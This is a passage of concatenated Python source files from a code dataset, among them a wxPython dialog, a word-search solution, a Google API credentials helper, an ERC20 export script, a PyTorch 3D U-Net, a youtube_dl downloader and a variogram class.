grid3.Add(self.chk_match, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 2\n choices = [\"continue\",\"terminate\"]\n lbl_pass = wx.StaticText(panel, label=\"On Pass:\") \n self.cbox_onpass = wx.ComboBox(panel, choices=choices, value=\"continue\", style=wx.CB_READONLY)\n grid3.Add(lbl_pass, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=2)\n grid3.Add(self.cbox_onpass, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 1\n lbl_failure = wx.StaticText(panel, label=\"On Failure:\") \n self.cbox_onfailure = wx.ComboBox(panel, choices=choices, value=\"continue\", style=wx.CB_READONLY)\n grid3.Add(lbl_failure, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=2)\n grid3.Add(self.cbox_onfailure, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 2\n lbl_local = wx.StaticText(panel, label=\"Local Name:\")\n default = defaultname = \"test\"\n index = 1\n while defaultname in self._variables[\"locals\"]:\n defaultname = default + str(index)\n index += 1 \n self.text_local = wx.TextCtrl(panel, value=defaultname)\n grid3.Add(lbl_local, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)\n grid3.Add(self.text_local, pos=(row,1), span=(0,2), flag=wx.ALL|wx.EXPAND, border=5)\n \n row += 1\n lbl_global = wx.StaticText(panel, label=\"Global Name:\")\n self.text_global = wx.TextCtrl(panel, value=\"\")\n grid3.Add(lbl_global, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)\n grid3.Add(self.text_global, pos=(row,1), span=(0,2), flag=wx.ALL|wx.EXPAND, border=5)\n \n # grid3.AddGrowableCol(0)\n grid3.AddGrowableCol(1)\n grid3.AddGrowableCol(2)\n grid3.AddGrowableCol(3)\n # grid3.AddGrowableCol(4)\n \n sbox_sizer3.Add(grid3, 1, wx.ALL|wx.EXPAND, 0)\n \n #-----\n hsizer_controls = wx.BoxSizer(wx.HORIZONTAL)\n hsizer_controls.AddStretchSpacer()\n btn_cancel = wx.Button(panel, label=\"Cancel\", id=wx.ID_CANCEL)\n btn_cancel.Bind(wx.EVT_BUTTON, self.OnButton)\n self.btn_add = wx.Button(panel, label=\"Add\", id=wx.ID_OK)\n self.btn_add.Bind(wx.EVT_BUTTON, self.OnButton)\n # self.btn_add.Disable()\n hsizer_controls.Add(btn_cancel, 0, wx.ALL|wx.EXPAND, 5)\n hsizer_controls.Add(self.btn_add, 0, wx.ALL|wx.EXPAND, 5)\n \n #add to main sizer\n # sizer.Add(sbox_sizer, 0, wx.ALL|wx.EXPAND, 2)\n sizer.Add(hsizer, 0, wx.ALL|wx.EXPAND, 5)\n sizer.Add(sbox_sizer3, 1, wx.ALL|wx.EXPAND, 5)\n sizer.Add(hsizer_controls, 0, wx.ALL|wx.EXPAND, 5)\n \n panel.SetSizer(sizer) \n \n w, h = sizer.Fit(self)\n \n try:\n self.SetIcon(theme.GetIcon(\"psu_png\"))\n except:\n pass\n \n def OnVarTextChange(self, event):\n pass\n \n def OnVarSelected(self, event):\n e = event.GetEventObject()\n name = e.GetName()\n \n if name == \"var1\":\n tc = self.text_var1 \n elif name == \"var2\":\n tc = self.text_var2\n \n string = e.GetStringSelection()\n insertion = tc.GetInsertionPoint()\n value = tc.GetValue()\n \n newvalue = value[:insertion] + string + value[insertion:] \n tc.SetValue(newvalue)\n \n tc.SetInsertionPoint(insertion+len(string))\n \n def OnOperationButton(self, event):\n e = event.GetEventObject()\n label = e.GetLabel()\n name = e.GetName()\n if name == \"var1\": \n tc = self.text_var1\n elif name == \"var2\": \n tc = self.text_var2\n \n insertion = tc.GetInsertionPoint()\n value = tc.GetValue()\n \n newvalue = value[:insertion] + label + value[insertion:] \n tc.SetValue(newvalue)\n \n tc.SetInsertionPoint(insertion+len(label))\n \n def OnButton(self, event):\n e = event.GetEventObject()\n label = e.GetLabel()\n id = e.GetId()\n \n if label == \"Cancel\":\n self.EndModal(id) \n elif label == \"Add\": \n self.EndModal(id)\n\n def SetValue(self, data):\n params = data[\"parameters\"]\n params = \"), \" + params[1:-1] + \", (\" #so we can split it easier\n \n param_dict = {}\n \n params = params.split(\"), (\")\n \n for param in params: \n param = param[1: -1] \n if param == \"\":\n continue\n key, value = param.split(\"', '\")\n param_dict[key] = value\n \n self.text_var1.SetValue(param_dict[\"var1\"])\n self.text_var2.SetValue(param_dict[\"var2\"])\n self.cbox_onpass.SetValue(param_dict[\"onpass\"])\n self.cbox_onfailure.SetValue(param_dict[\"onfailure\"])\n \n \n if param_dict[\"matchcase\"] == \"True\":\n self.chk_match.SetValue(1)\n else:\n self.chk_match.SetValue(0)\n \n if param_dict[\"var1literal\"] == \"True\":\n self.chk_literal.SetValue(1)\n else:\n self.chk_literal.SetValue(0)\n \n if param_dict[\"var2literal\"] == \"True\":\n self.chk_literal2.SetValue(1)\n else:\n self.chk_literal2.SetValue(0)\n \n self.text_local.SetValue(data[\"local\"])\n self.text_global.SetValue(data[\"global\"])\n \n def GetValue(self):\n \n var1 = self.text_var1.GetValue()\n for char in var1:\n if char.isdigit() or char.isalpha():\n continue\n elif char in self.operations:\n continue\n elif char in [\".\", \"#\", \"?\", \">\", \"<\", \"[\", \"]\"]: \n continue\n \n var1 = var1.replace(char, \"\") \n \n var2 = self.text_var2.GetValue()\n for char in var2:\n if char.isdigit() or char.isalpha():\n continue\n elif char in self.operations:\n continue\n elif char in [\".\", \"#\", \"?\", \">\", \"<\", \"[\", \"]\"]:\n continue\n \n var2 = var2.replace(char, \"\") \n \n data = [(\"var1\", var1),\n (\"var2\", var2),\n (\"onpass\", self.cbox_onpass.GetValue()),\n (\"onfailure\", self.cbox_onfailure.GetValue()),\n (\"cond\", self.cbox_cond.GetValue()),\n (\"var1literal\", str(self.chk_literal.GetValue())),\n (\"var2literal\", str(self.chk_literal2.GetValue())), \n (\"matchcase\", str(self.chk_match.GetValue()))]\n \n data = {\"action\":\"String Compare\", \n \"parameters\":str(data)}\n \n local = self.text_local.GetValue()\n if local != \"\":\n for char in local:\n if char.isdigit() or char.isalpha():\n continue\n local = local.replace(char, \"_\") \n data[\"local\"] = local\n \n glob = self.text_global.GetValue()\n if glob != \"\":\n for char in glob:\n if char.isdigit() or char.isalpha():\n continue\n glob = glob.replace(char, \"_\") \n data[\"global\"] = glob\n \n return data ","sub_path":"dialogs/stringcompare.py","file_name":"stringcompare.py","file_ext":"py","file_size_in_byte":12043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501884714","text":"from typing import List\n\n\nclass Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n self.width = len(board[0])\n self.height = len(board)\n self.board = board\n self.word = word\n\n for i in range(self.height):\n for j in range(self.width):\n if self.backtrack(i, j, 0):\n return True\n return False\n\n def backtrack(self, i, j, p: int) -> bool:\n if i < 0 or i == self.height or j < 0 or j == self.width or self.word[p] != self.board[i][j]:\n return False\n\n if len(self.word) -1 == p:\n return True\n\n self.board[i][j] = \"#\"\n res = False\n for iOffset, jOffset in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n if self.backtrack(i + iOffset, j + jOffset, p+1):\n res = True\n break\n self.board[i][j] = self.word[p]\n return res\n\n\nif __name__ == \"__main__\":\n s = Solution()\n print(s.exist([[\"a\",\"a\"]], \"aaa\"), False)\n print(s.exist([[\"a\",\"b\"],[\"c\",\"d\"]], \"cdba\"), True)\n print(s.exist([[\"A\",\"B\",\"C\",\"E\"],\n [\"S\",\"F\",\"E\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]], \"ABCESEEEFS\"), True)\n print(s.exist([[\"A\",\"B\",\"C\",\"E\"],\n [\"S\",\"F\",\"C\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]], \"ABCB\"), False)\n print(s.exist([[\"A\",\"B\",\"C\",\"E\"],\n [\"S\",\"F\",\"C\",\"S\"],\n [\"A\",\"D\",\"E\",\"E\"]], \"ABCCED\"), True)","sub_path":"leetcode/p0079_word_search/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"542449461","text":"# -*- coding: utf-8 -*-\n#\n# Reference:\n# Python Quickstart https://developers.google.com/admin-sdk/directory/v1/quickstart/python\n#\n\nimport os.path\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\n\n# If modifying these scopes, delete your previously saved credentials \"./.credentials/\"\n\"\"\"\nSCOPES = [\n 'https://www.googleapis.com/auth/admin.directory.user',\n 'https://www.googleapis.com/auth/admin.directory.group',\n 'https://www.googleapis.com/auth/admin.directory.group.member'\n]\n\"\"\"\nSCOPES = [\n 'https://www.googleapis.com/auth/admin.directory.user.readonly',\n 'https://www.googleapis.com/auth/admin.directory.group.readonly',\n 'https://www.googleapis.com/auth/admin.directory.group.member.readonly'\n]\nCLIENT_SECRET_FILE = './client_secret.json'\nAPPLICATION_NAME = 'Google Directory API Python'\n\n\ndef get_credentials():\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n\n current_dir = os.path.expanduser('./')\n credential_dir = os.path.join(current_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n ##credential_path = os.path.join(credential_dir, 'token.pickle')\n credential_path = os.path.join(credential_dir, 'token.json')\n\n if os.path.exists(credential_path):\n creds = Credentials.from_authorized_user_file(credential_path, SCOPES)\n ##with open(credential_path, 'rb') as token:\n ## creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n CLIENT_SECRET_FILE, SCOPES)\n # Migrate the console strategy to the local server strategy\n # [Migrate your impacted OAuth out-of-band flow to an alternative method before Oct. 3, 2022]\n # https://developers.google.com/identity/protocols/oauth2/resources/oob-migration\n # https://developers.google.com/identity/protocols/oauth2/native-app#request-parameter-redirect_uri\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open(credential_path, 'w') as token:\n token.write(creds.to_json())\n\n return creds\n","sub_path":"googlectl/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115486665","text":"#!/usr/bin/env python3\nimport argparse\n\nfrom web3 import IPCProvider, Web3\n\nfrom ethereumetl.jobs.export_erc20_transfers_job import ExportErc20TransfersJob\nfrom ethereumetl.thread_local_proxy import ThreadLocalProxy\n\nparser = argparse.ArgumentParser(\n description='Exports ERC20 transfers using eth_newFilter and eth_getFilterLogs JSON RPC APIs.')\nparser.add_argument('-s', '--start-block', default=0, type=int, help='Start block')\nparser.add_argument('-e', '--end-block', required=True, type=int, help='End block')\nparser.add_argument('-b', '--batch-size', default=100, type=int, help='The number of blocks to filter at a time.')\nparser.add_argument('-o', '--output', default='-', type=str, help='The output file. If not specified stdout is used.')\nparser.add_argument('-w', '--max-workers', default=5, type=int, help='The maximum number of workers.')\nparser.add_argument('--ipc-path', required=True, type=str, help='The full path to the ipc socket file.')\nparser.add_argument('--ipc-timeout', default=300, type=int, help='The timeout in seconds for ipc calls.')\nparser.add_argument('-t', '--tokens', default=None, type=str, nargs='+',\n help='The list of token addresses to filter by.')\n\nargs = parser.parse_args()\n\njob = ExportErc20TransfersJob(\n start_block=args.start_block,\n end_block=args.end_block,\n batch_size=args.batch_size,\n web3=ThreadLocalProxy(lambda: Web3(IPCProvider(args.ipc_path, timeout=args.ipc_timeout))),\n output=args.output,\n max_workers=args.max_workers,\n tokens=args.tokens)\n\njob.run()\n","sub_path":"ethereum-etl/export_erc20_transfers.py","file_name":"export_erc20_transfers.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553155516","text":"import json\nimport random\n\n# Creates a random bar chart value.\n# 50% chance of having a value != 0. If it has a value,\n# it's a value between 0 and 1.\ndef newRandomValue():\n rand = random.uniform(0, 1)\n if rand > 0.5:\n return random.uniform(0, 1)\n else:\n return 0\n\n# Creates a random 'block' of bars.\n# 30% chance of having any bars. If it has bars, it uses\n# newRandomValue() to generate the bars.\ndef newRandomBlock(prefix):\n rand = random.uniform(0, 1)\n block = {}\n if rand > 0.7:\n block[prefix + '_mono_fine'] = newRandomValue()\n block[prefix + '_mono_coarse'] = newRandomValue()\n block[prefix + '_matt_painted'] = newRandomValue()\n block[prefix + '_impressed'] = newRandomValue()\n block[prefix + '_black_glazed'] = newRandomValue()\n else:\n block[prefix + '_mono_fine'] = 0\n block[prefix + '_mono_coarse'] = 0\n block[prefix + '_matt_painted'] = 0\n block[prefix + '_impressed'] = 0\n block[prefix + '_black_glazed'] = 0\n\n return block\n\ndef newRandomSpecialCategoryBlock():\n rand = random.uniform(0, 1)\n if rand > 0.8:\n return {\n 'archaika': newRandomValue(),\n 'defunct': newRandomValue(),\n 'miniatures': newRandomValue()\n }\n else:\n return {\n 'archaika': 0,\n 'defunct': 0,\n 'miniatures': 0\n }\n\n# Creates a random fingerprint row, using newRandomBlock\ndef newRandomRow():\n row = newRandomBlock('local')\n row.update(newRandomBlock('regional'))\n row.update(newRandomBlock('loc_reg'))\n row.update(newRandomBlock('import'))\n row.update(newRandomSpecialCategoryBlock())\n return row\n\n# Creates a new random assemblage fingerprint\ndef newRandomAssemblage():\n return {\n 'sector': '',\n 'layer_context': '',\n 'date': {\n 'from': 0,\n 'to': 0\n },\n 'fp_ceramic': {\n 'longterm_storage': newRandomRow(),\n 'shortterm_storage': newRandomRow(),\n 'preparation_cooking': newRandomRow(),\n 'food': newRandomRow(),\n 'mixing_drinks': newRandomRow(),\n 'serving_drinks': newRandomRow(),\n 'consuming_drinks': newRandomRow(),\n 'perfumes_fragrances': newRandomRow(),\n 'light': newRandomRow(),\n 'storage_non_edible': newRandomRow(),\n 'unidentified': newRandomRow()\n }\n }\n\nassemblages = [\n newRandomAssemblage(),\n newRandomAssemblage(),\n newRandomAssemblage(),\n newRandomAssemblage()\n]\n\nprint(json.dumps(assemblages, indent=2))\n","sub_path":"createDummyFP.py","file_name":"createDummyFP.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159739490","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.modules.padding import ReplicationPad3d, ReplicationPad3d\n\n\nclass Unet3D(nn.Module):\n \"\"\"EF segmentation network.\"\"\"\n\n def __init__(self, input_nbr, label_nbr):\n super(Unet3D, self).__init__()\n\n self.input_nbr = input_nbr\n\n self.conv11 = nn.Conv3d(input_nbr, 16, kernel_size=3, padding=1)\n self.bn11 = nn.BatchNorm3d(16)\n self.do11 = nn.Dropout3d(p=0.2)\n self.conv12 = nn.Conv3d(16, 16, kernel_size=3, padding=1)\n self.bn12 = nn.BatchNorm3d(16)\n self.do12 = nn.Dropout3d(p=0.2)\n\n self.conv21 = nn.Conv3d(16, 32, kernel_size=3, padding=1)\n self.bn21 = nn.BatchNorm3d(32)\n self.do21 = nn.Dropout3d(p=0.2)\n self.conv22 = nn.Conv3d(32, 32, kernel_size=3, padding=1)\n self.bn22 = nn.BatchNorm3d(32)\n self.do22 = nn.Dropout3d(p=0.2)\n\n self.conv31 = nn.Conv3d(32, 64, kernel_size=3, padding=1)\n self.bn31 = nn.BatchNorm3d(64)\n self.do31 = nn.Dropout3d(p=0.2)\n self.conv32 = nn.Conv3d(64, 64, kernel_size=3, padding=1)\n self.bn32 = nn.BatchNorm3d(64)\n self.do32 = nn.Dropout3d(p=0.2)\n self.conv33 = nn.Conv3d(64, 64, kernel_size=3, padding=1)\n self.bn33 = nn.BatchNorm3d(64)\n self.do33 = nn.Dropout3d(p=0.2)\n\n self.conv41 = nn.Conv3d(64, 128, kernel_size=3, padding=1)\n self.bn41 = nn.BatchNorm3d(128)\n self.do41 = nn.Dropout3d(p=0.2)\n self.conv42 = nn.Conv3d(128, 128, kernel_size=3, padding=1)\n self.bn42 = nn.BatchNorm3d(128)\n self.do42 = nn.Dropout3d(p=0.2)\n self.conv43 = nn.Conv3d(128, 128, kernel_size=3, padding=1)\n self.bn43 = nn.BatchNorm3d(128)\n self.do43 = nn.Dropout3d(p=0.2)\n\n\n self.upconv4 = nn.ConvTranspose3d(128, 128, kernel_size=3, padding=1, stride=2, output_padding=1)\n\n self.conv43d = nn.ConvTranspose3d(256, 128, kernel_size=3, padding=1)\n self.bn43d = nn.BatchNorm3d(128)\n self.do43d = nn.Dropout3d(p=0.2)\n self.conv42d = nn.ConvTranspose3d(128, 128, kernel_size=3, padding=1)\n self.bn42d = nn.BatchNorm3d(128)\n self.do42d = nn.Dropout3d(p=0.2)\n self.conv41d = nn.ConvTranspose3d(128, 64, kernel_size=3, padding=1)\n self.bn41d = nn.BatchNorm3d(64)\n self.do41d = nn.Dropout3d(p=0.2)\n\n self.upconv3 = nn.ConvTranspose3d(64, 64, kernel_size=3, padding=1, stride=2, output_padding=1)\n\n self.conv33d = nn.ConvTranspose3d(128, 64, kernel_size=3, padding=1)\n self.bn33d = nn.BatchNorm3d(64)\n self.do33d = nn.Dropout3d(p=0.2)\n self.conv32d = nn.ConvTranspose3d(64, 64, kernel_size=3, padding=1)\n self.bn32d = nn.BatchNorm3d(64)\n self.do32d = nn.Dropout3d(p=0.2)\n self.conv31d = nn.ConvTranspose3d(64, 32, kernel_size=3, padding=1)\n self.bn31d = nn.BatchNorm3d(32)\n self.do31d = nn.Dropout3d(p=0.2)\n\n self.upconv2 = nn.ConvTranspose3d(32, 32, kernel_size=3, padding=1, stride=2, output_padding=1)\n\n self.conv22d = nn.ConvTranspose3d(64, 32, kernel_size=3, padding=1)\n self.bn22d = nn.BatchNorm3d(32)\n self.do22d = nn.Dropout3d(p=0.2)\n self.conv21d = nn.ConvTranspose3d(32, 16, kernel_size=3, padding=1)\n self.bn21d = nn.BatchNorm3d(16)\n self.do21d = nn.Dropout3d(p=0.2)\n\n self.upconv1 = nn.ConvTranspose3d(16, 16, kernel_size=3, padding=1, stride=2, output_padding=1)\n\n self.conv12d = nn.ConvTranspose3d(32, 16, kernel_size=3, padding=1)\n self.bn12d = nn.BatchNorm3d(16)\n self.do12d = nn.Dropout3d(p=0.2)\n self.conv11d = nn.ConvTranspose3d(16, label_nbr, kernel_size=3, padding=1)\n\n self.sm = nn.LogSoftmax(dim=1)\n\n def forward(self, x):\n \"\"\"Forward method.\"\"\"\n xs = []#x[0].unsqueeze(2)\n for tens_x in x:\n xs.append(tens_x.unsqueeze(2))\n x = torch.cat(xs, 2)\n # Stage 1\n x11 = self.do11(F.relu(self.bn11(self.conv11(x))))\n x12 = self.do12(F.relu(self.bn12(self.conv12(x11))))\n x1p = F.max_pool3d(x12, kernel_size=(1,2,2), stride=2)\n\n # Stage 2\n x21 = self.do21(F.relu(self.bn21(self.conv21(x1p))))\n x22 = self.do22(F.relu(self.bn22(self.conv22(x21))))\n x2p = F.max_pool3d(x22, kernel_size=(1,2,2), stride=2)\n\n # Stage 3\n x31 = self.do31(F.relu(self.bn31(self.conv31(x2p))))\n x32 = self.do32(F.relu(self.bn32(self.conv32(x31))))\n x33 = self.do33(F.relu(self.bn33(self.conv33(x32))))\n x3p = F.max_pool3d(x33, kernel_size=(1,2,2), stride=2)\n\n # Stage 4\n x41 = self.do41(F.relu(self.bn41(self.conv41(x3p))))\n x42 = self.do42(F.relu(self.bn42(self.conv42(x41))))\n x43 = self.do43(F.relu(self.bn43(self.conv43(x42))))\n x4p = F.max_pool3d(x43, kernel_size=(1,2,2), stride=2)\n\n\n # Stage 4d\n x4d = self.upconv4(x4p)\n \n pad4 = ReplicationPad3d((0, x43.size(4) - x4d.size(4), 0, x43.size(3) - x4d.size(3), 0, x43.size(2) - x4d.size(2)))\n x4d = torch.cat((pad4(x4d), x43), 1)\n x43d = self.do43d(F.relu(self.bn43d(self.conv43d(x4d))))\n x42d = self.do42d(F.relu(self.bn42d(self.conv42d(x43d))))\n x41d = self.do41d(F.relu(self.bn41d(self.conv41d(x42d))))\n\n # Stage 3d\n x3d = self.upconv3(x41d)\n pad3 = ReplicationPad3d((0, x33.size(4) - x3d.size(4), 0, x33.size(3) - x3d.size(3), 0, x33.size(2) - x3d.size(2)))\n x3d = torch.cat((pad3(x3d), x33), 1)\n x33d = self.do33d(F.relu(self.bn33d(self.conv33d(x3d))))\n x32d = self.do32d(F.relu(self.bn32d(self.conv32d(x33d))))\n x31d = self.do31d(F.relu(self.bn31d(self.conv31d(x32d))))\n\n # Stage 2d\n x2d = self.upconv2(x31d)\n pad2 = ReplicationPad3d((0, x22.size(4) - x2d.size(4), 0, x22.size(3) - x2d.size(3), 0, x22.size(2) - x2d.size(2)))\n x2d = torch.cat((pad2(x2d), x22), 1)\n x22d = self.do22d(F.relu(self.bn22d(self.conv22d(x2d))))\n x21d = self.do21d(F.relu(self.bn21d(self.conv21d(x22d))))\n\n # Stage 1d\n x1d = self.upconv1(x21d)\n pad1 = ReplicationPad3d((0, x12.size(4) - x1d.size(4), 0, x12.size(3) - x1d.size(3), 0, x12.size(2) - x1d.size(2)))\n x1d = torch.cat((pad1(x1d), x12), 1)\n x12d = self.do12d(F.relu(self.bn12d(self.conv12d(x1d))))\n x11d = self.conv11d(x12d)\n final = F.max_pool3d(x11d, kernel_size=(x11d.shape[2],1,1), stride=1)\n \n return final.squeeze().unsqueeze(1)\n","sub_path":"time-dependent/segmentation/pytorch/models/siamese3d.py","file_name":"siamese3d.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"285444518","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n__author__ = \"Jakub 'Gradam' Semik\"\n\n\nimport youtube_dl\nimport logging\nimport webbrowser\nimport sys\nimport io\n\nlogging.getLogger().setLevel(logging.ERROR)\n\n\nclass DownlaodYt:\n def __init__(self, url, video, audio):\n print(video)\n self.url = url\n self.video = video\n self.audio = audio\n self.get_settings()\n self.download_result = io.StringIO()\n\n def start_dowanload(self):\n if self.video:\n self.get_video()\n if self.audio:\n self.get_audio()\n\n\n def get_settings(self):\n self.path = ''\n\n\n def get_audio(self):\n options = {\n 'format': 'bestaudio/best',\n }\n\n self.download_result = io.StringIO()\n sys.stdout = self.download_result\n\n with youtube_dl.YoutubeDL(options) as ydl:\n ydl.download([self.url])\n\n sys.stdout = sys.__stdout__\n\n\n def get_video(self):\n print(self.url)\n options = {\n 'format': 'bestvideo/best'\n }\n\n self.download_result = io.StringIO()\n sys.stdout = self.download_result\n\n with youtube_dl.YoutubeDL(options) as ydl:\n ydl.download(self.url)\n\n sys.stdout = sys.__stdout__\n\n\nclass DownloadTorrent:\n def __init__(self):\n pass\n\n @staticmethod\n def download_start(_, link):\n webbrowser.open(link)\n\n\n\ndef main():\n a = DownlaodYt('hsdfsghfdfgxA', True)\n print(a)\n\nif __name__ == '__main__':\n main()","sub_path":"Downloader.py","file_name":"Downloader.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"176972630","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\n\npackages = [\n 'django_env_server',\n 'django_env_server.management',\n 'django_env_server.management.commands',\n]\n\nsetup(\n name='django_env_server',\n version='0.0.2',\n packages=packages,\n license='MIT',\n description='Load environment variables into the Django development server',\n long_description='Load environment variables into the Django development server',\n author='Matt Foster',\n author_email='matt@mcfstr.com',\n url='https://github.com/mcfstr/django-env-server',\n install_requires=['django >= 1.4'],\n)\n","sub_path":"pypi_install_script/django_env_server-0.0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"75265114","text":"\"\"\"\nVariogram Klasse\n\"\"\"\n\nfrom skgstat.distance import nd_dist\nfrom skgstat.binning import binify_even_width, binify_even_bin, group_to_bin\nfrom skgstat.estimator import matheron, cressie, dowd, genton, minmax, entropy\nfrom skgstat.models import spherical, exponential, gaussian, cubic, stable, matern\nimport numpy as np\nfrom pandas import DataFrame\nimport copy\nimport matplotlib.pyplot as plt\nfrom matplotlib.axes import SubplotBase\nfrom scipy.optimize import curve_fit\n\n\nclass Variogram(object):\n \"\"\"\n Variogram repesentation.\n\n This class can generate a Semivariogram from a given sample.\n By default, the sample point pairs are ordered into even-width bin,\n separated by the euclidean distance of the point pairs.\n The Semivariance in the bin is calculated by the Matheron estimator\n and a spherical Varigram function is fitted by least squares to the experimental Variogram.\n\n The distance matrix, bin matrix, semi-variance estimator and theoretical variogram function can all be changed on\n instantiation. The Variogram class can be used to return the result data, plot the Variogram, estimate the\n kriging weights and create a Kriging instance.\n\n \"\"\"\n def __init__(self, coordinates=None, values=None, dm_func=nd_dist, bm_func=binify_even_width,\n estimator=matheron, model=spherical, dm=None, bm=None, normalize=True, fit_method='lm',\n pec_punish=1.0, is_directional=False, azimuth=0, tolerance=45.0, use_nugget=False, maxlag=None,\n N=None, verbose=False):\n \"\"\"\n\n :param coordinates: numpy array or list with the coordinates of the sample as tuples\n :param values: numpy array or list with the Values of the sample. If ndim > 1 an aggregator is used\n :param dm_func: function which is used to calculate the distance matrix\n :param bm_func: function which is used to calculate the binning matrix\n :param estimator: estimator can be a function or a string identifying a standard estimator\n Supported are 'matheron', 'cressie', 'dowd' or 'genton'\n :param model: string or callable with the theoretical variogram function\n :param dm: numpy array with the distance matrix of the given sample\n :param bm: numpy array with the binning matrix of the given sample\n :param normalize: boolean, specify if the lag should be given absolute or relative to the maxlag\n :param fit_method: The method for fitting the theoretical model.\n Either 'lm' for least squares or 'pec' for point exclusion cost'\n :param pec_punish: If 'pec' is the fit_method, give the power of punishing the point exclusion.\n 1 is full punish; 0 non-punish.\n :param is_directional:\n :param azimuth\n :param tolerance:\n :param use_nugget: boolean, set if nugget effect shall be used\n :param maxlag:\n :param N: number of bins\n :param verbose:\n \"\"\"\n\n # Set coordinates and values\n self._X = list(coordinates)\n self.values = list(values)\n\n # set verbosity\n self.verbose = verbose\n\n # if values is given with ndim > 1, set an aggregator\n self.agg = np.nanmean\n\n # bm properites\n self.maxlag = maxlag\n self._bm_kwargs = {}\n self._dm_kwargs = {}\n\n # save the functions, if the matrixes are not given\n if dm is None:\n self.dm_func = dm_func\n else:\n self._dm = dm\n\n if bm is None:\n self.bm_func = bm_func\n else:\n self._bm = bm\n\n # estimator can be a function or a string identifying a standard estimator\n self.set_estimator(estimator=estimator)\n\n # model can be a function or a string identifying a standard variogram function\n self.set_model(model=model)\n\n # specify if the lag should be given absolute or relative to the maxlag\n self.normalized = normalize\n\n # set the fitting method and model quality measure\n self.fit_method = fit_method\n self.pec_punish = pec_punish\n\n # set directionality\n self.is_directional = is_directional\n self.azimuth = azimuth # Set is_directional as True if azimuth is given?\n self.tolerance = tolerance\n\n # set if nugget effect shall be used\n self.use_nugget = use_nugget\n\n # set binning matrix if N was given\n if N is not None:\n self.set_bm(N=N)\n\n @property\n def estimator(self):\n return self._estimator\n\n @estimator.setter\n def estimator(self, value):\n self.set_estimator(estimator=value)\n\n def set_estimator(self, estimator):\n \"\"\"\n Set estimator as the new Variogram estimator. Either a function returning a single or a list of semivariance\n values is needed, or a string identifiying a default one.\n Supported are 'matheron', 'cressie', 'dowd' or 'genton'.\n \"\"\"\n if isinstance(estimator, str):\n if estimator.lower() == 'matheron':\n self._estimator = matheron\n elif estimator.lower() == 'cressie':\n self._estimator = cressie\n elif estimator.lower() == 'dowd':\n self._estimator = dowd\n elif estimator.lower() == 'genton':\n self._estimator = genton\n elif estimator.lower() == 'minmax':\n self._estimator = minmax\n elif estimator.lower() == 'entropy' or estimator.lower() == 'h':\n self._estimator = entropy\n else:\n raise ValueError('Variogram estimator %s is not understood, please provide the function.' % estimator)\n else:\n self._estimator = estimator\n\n @property\n def model(self):\n return self._model\n\n @model.setter\n def model(self, value):\n self.set_model(model=value)\n\n def set_model(self, model):\n \"\"\"\n Set model as the new theoretical variogram function. Either a function returning the semivariance at a given lag\n for given parameters is needed, or a string identifying a default one. Supported are 'spherical', 'exponential'\n or 'gaussian'.\n\n :param model:\n :return:\n \"\"\"\n if isinstance(model, str):\n if model.lower() == 'spherical':\n self._model = spherical\n elif model.lower() == 'exponential':\n self._model = exponential\n elif model.lower() == 'gaussian':\n self._model = gaussian\n elif model.lower() == 'cubic':\n self._model = cubic\n elif model.lower() == 'stable':\n self._model = stable\n elif model.lower() == 'matern':\n self._model = matern\n else:\n raise ValueError('The theoretical Variogram function %s is not understood, '\n 'please provide the function' % model)\n else:\n self._model = model\n\n def binify_like(self, how='even width'):\n \"\"\"\n Specify, how the bins for the Variogram shall be drawn. how can identify one of the prepared binning algorithms.\n Use 'even_width' or 'even width' for the binify_even_width function and 'even bin' or 'even_bin' for the\n binity_even_bins function. If how is callable, it will be used as bm_func.\n It will be called by the bm property with N, the number of bins and the bm_kwargs as arguments and has to return\n the bm matrix and an array of bin widths.\n\n :param how:\n :return:\n \"\"\"\n # remove the _bm if necessary\n if hasattr(self, '_bm'):\n delattr(self, '_bm')\n if hasattr(self, 'bin_widths'):\n delattr(self, 'bin_widths')\n\n if callable(how):\n self.bm_func = how\n elif how.lower().replace('_', ' ') == 'even width':\n self.bm_func = binify_even_width\n elif how.lower().replace('_', ' ') == 